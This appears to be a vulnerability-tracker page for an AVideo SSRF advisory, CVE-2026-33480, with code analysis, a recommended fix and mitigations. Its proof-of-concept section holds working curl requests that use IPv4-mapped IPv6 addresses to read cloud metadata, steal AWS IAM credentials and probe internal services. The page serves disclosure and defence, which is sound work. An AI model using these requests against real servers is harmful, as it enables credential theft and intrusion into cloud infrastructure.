PHP
CVE-2026-33480
HIGH
Severity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The isSSRFSafeURL() function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x). The unauthenticated plugin/LiveLinks/proxy.php endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services.
Details
The isSSRFSafeURL() function in objects/functions.php (lines 4021-4169) implements SSRF protection with two separate check paths:
- IPv4 checks (lines 4101-4134): Regex patterns matching dotted-decimal notation (
/^10\./,/^172\./,/^192\.168\./,/^127\./,/^169\.254\./) - IPv6 checks (lines 4150-4166): Checks for
::1,fe80::/10(link-local), andfc00::/7(unique local)
The gap: IPv4-mapped IPv6 addresses (::ffff:0:0/96) are not checked in either path. When a URL like http://[::ffff:169.254.169.254]/ is provided:
// Line 4038: parse_url strips brackets from IPv6 host
$host = parse_url($url, PHP_URL_HOST);
// $host = "::ffff:169.254.169.254"
// Line 4079: filter_var recognizes it as valid IPv6, skips DNS resolution
if (!filter_var($host, FILTER_VALIDATE_IP)) {
$resolvedIP = gethostbyname($host); // SKIPPED
}
$ip = $host; // $ip = "::ffff:169.254.169.254"
// Lines 4101-4134: IPv4 regex checks DON'T match (not dotted-decimal)
if (preg_match('/^169\.254\.\d{1,3}\.\d{1,3}$/', $ip)) // NO MATCH
// Lines 4150-4166: IPv6 checks don't cover ::ffff: prefix
if ($ip === '::1' || ...) // NO MATCH
if (preg_match('/^fe[89ab][0-9a-f]:/i', $ip)) // NO MATCH
if (preg_match('/^f[cd][0-9a-f]{2}:/i', $ip)) // NO MATCH
// Line 4168: returns TRUE - bypass complete
return true;The vulnerable endpoint plugin/LiveLinks/proxy.php explicitly disables authentication:
// proxy.php lines 2-3
$doNotConnectDatabaseIncludeConfig = 1;
$doNotStartSessionbaseIncludeConfig = 1;After the bypass, two requests are made to the attacker-controlled URL:
get_headers()at line 40 (via stream context)fakeBrowser()at line 63 (via curl) - response content is echoed back to the attacker (lines 69-80)
PoC
Read AWS instance metadata (IAM credentials):
curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/'Access localhost services:
curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:127.0.0.1]:3306/'Scan internal network:
curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:10.0.0.1]/'Steal AWS IAM role credentials (full chain):
# Step 1: Get IAM role name
ROLE=$(curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/')
# Step 2: Get temporary credentials for the role
curl -s "https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/${ROLE}"Impact
- Cloud credential theft: Unauthenticated attackers can read cloud instance metadata (AWS IMDSv1, GCP, Azure) to steal IAM credentials, potentially gaining full access to cloud infrastructure.
- Internal network access: Attackers can scan and access internal services not exposed to the internet, including databases, admin panels, and other backend services.
- Localhost service access: Attackers can interact with services bound to localhost (e.g., Redis, Memcached, internal APIs).
- No authentication required: The endpoint explicitly disables session handling and database connections, making this exploitable by any anonymous internet user.
Recommended Fix
Replace the manual IPv4/IPv6 blocklist approach with PHP's built-in FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE flags, which correctly handle all private/reserved ranges including IPv4-mapped IPv6 addresses:
// In isSSRFSafeURL(), replace lines 4099-4166 with:
// Block all private and reserved IP ranges (handles IPv4, IPv6, and IPv4-mapped IPv6)
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
_error_log("isSSRFSafeURL: blocked private/reserved IP: {$ip}");
return false;
}This single check replaces all the manual regex patterns and correctly handles:
- All RFC 1918 private ranges (10/8, 172.16/12, 192.168/16)
- Loopback (127/8, ::1)
- Link-local (169.254/16, fe80::/10)
- Unique local (fc00::/7)
- IPv4-mapped IPv6 (
::ffff:0:0/96) - the bypass vector in this finding - Other reserved ranges (0/8, 100.64/10 CGN, etc.)
AnalysisAI
AVideo, an open-source video platform, contains a server-side request forgery (SSRF) vulnerability that allows unauthenticated attackers to bypass URL validation using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x format). The vulnerable endpoint plugin/LiveLinks/proxy.php can be exploited to access cloud metadata services (AWS, GCP, Azure), internal networks, and localhost services without authentication. A detailed proof-of-concept is publicly available demonstrating credential theft from AWS instance metadata, making this a critical risk for cloud-hosted installations.
Technical ContextAI
The vulnerability affects the AVideo platform (pkg:composer/wwbn_avideo) and stems from CWE-918 (Server-Side Request Forgery). The isSSRFSafeURL() function in objects/functions.php implements SSRF protection through separate validation paths for IPv4 (using regex patterns for dotted-decimal notation) and IPv6 (checking for ::1, fe80::/10, and fc00::/7). However, this blocklist approach fails to validate IPv4-mapped IPv6 addresses (::ffff:0:0/96 range). When parse_url() extracts the host and filter_var() recognizes it as valid IPv6, the address bypasses both IPv4 regex checks (which require dotted-decimal format) and IPv6 checks (which don't include the ::ffff: prefix). The proxy.php endpoint explicitly disables authentication mechanisms ($doNotConnectDatabaseIncludeConfig and $doNotStartSessionbaseIncludeConfig), allowing anonymous exploitation. The endpoint makes two requests using get_headers() and fakeBrowser() (curl), with responses echoed back to the attacker.
RemediationAI
Apply patches available through the GitHub security advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh. The recommended fix replaces the manual blocklist approach with PHP's built-in filter_var() using FILTER_FLAG_NO_PRIV_RANGE and FILTER_FLAG_NO_RES_RANGE flags, which correctly handle IPv4-mapped IPv6 addresses along with all private and reserved IP ranges. Until patching is complete, implement immediate mitigations: disable the LiveLinks plugin if not required, implement web application firewall (WAF) rules to block requests to plugin/LiveLinks/proxy.php, restrict outbound network connections from the AVideo server to prevent metadata service access (block 169.254.169.254 and similar ranges at the network level), and for cloud deployments, upgrade to IMDSv2 (AWS) or equivalent metadata service protections that require additional headers. Monitor access logs for requests containing IPv6 bracket notation with ::ffff: prefixes as indicators of exploitation attempts.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-p3gr-g84w-g8hh